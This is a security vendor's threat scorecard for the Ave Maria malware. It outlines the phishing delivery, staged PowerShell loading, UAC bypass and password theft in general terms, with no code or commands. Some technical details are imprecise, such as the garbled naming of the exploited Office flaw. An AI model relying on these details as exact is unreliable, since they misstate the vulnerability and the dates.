Ave Maria
Threat Scorecard
EnigmaSoft Threat Scorecard
EnigmaSoft Threat Scorecards are assessment reports for different malware threats which have been collected and analyzed by our research team. EnigmaSoft Threat Scorecards evaluate and rank threats using several metrics including real-world and potential risk factors, trends, frequency, prevalence, and persistence. EnigmaSoft Threat Scorecards are updated regularly based on our research data and metrics and are useful for a wide range of computer users, from end users seeking solutions to remove malware from their systems to security experts analyzing threats.
EnigmaSoft Threat Scorecards display a variety of useful information, including:
Popularity Rank: The ranking of a particular threat in EnigmaSoft’s Threat Database.
Severity Level: The determined severity level of an object, represented numerically, based on our risk modeling process and research, as explained in our Threat Assessment Criteria.
Infected Computers: The number of confirmed and suspected cases of a particular threat detected on infected computers as reported by SpyHunter.
See also Threat Assessment Criteria.
| Threat Level: | 60 % (Medium) |
| Infected Computers: | 322 |
| First Seen: | February 5, 2019 |
| Last Seen: | October 1, 2021 |
| OS(es) Affected: | Windows |
Ave Maria is a piece of malware, which was uncovered by cybersecurity researchers rather recently. It was first spotted back in January 2019 when several Italian companies were selected by the Ave Maria malware. All the companies were in the energy sector, namely dealing with gas and oil. Employees of these corporations were targeted via a phishing email campaign. The emails sent to the people working in the targeted companies contained attached Microsoft Office files macro-laced with a script that executes a series of PowerShell commands that aim to deploy Ave Maria's payload and gain persistence. The Ave Maria malware would exploit a vulnerability in the Microsoft Office Service Pack called 2017-11882. Through this vulnerability, the attacker can remotely download and execute .exe files on the system that has been infiltrated.
The fact that high-profile companies like the ones targeted in Italy would come to show us that the attackers are likely after some sensitive data that they can extract. This is what the Ave Maria malware is built for. This cunning malware is capable of collecting Web browser passwords. It can even gather passwords from Mozilla Firefox, which are encrypted and decrypt them. While in previous campaigns the authors of the Ave Maria malware used the AutoIt scripting language to execute the deployment and initialization of their product, now they have opted for an alternative route that relies on a complicated multi-stage attack that may enable them to dodge the detection of some anti-virus products.
The Ave Maria malware was employed again recently. The attackers used the tried and tested method of launching a phishing email campaign. This time, however, the creators of the Ave Maria malware have chosen a different method of infection. They use a combination of VBScript, PowerShell commands, and obfuscated code hosted on a public text storing service to execute the attack. PowerShell extracts information from a popular website that stores text. Next, the obfuscated data is decoded, and this triggers the process responsible for the execution of the Ave Maria.
When the Ave Maria malware is deployed, it will use a vulnerability in the Windows Component called PkgMgr. Exploiting this vulnerability lets Ave Maria go through the UAC (User Account Controls) uninterrupted, which means that the creators of the malware would have access to sensitive data, which they can collect easily. Once again, the Ave Maria malware targets sensitive information stored in Mozilla Firefox, as well as any email applications that may be installed on the system.
The Ave Maria malware is threatening particularly, and companies need to employ and maintain a high-quality anti-malware suite to keep threats like this away from their servers.
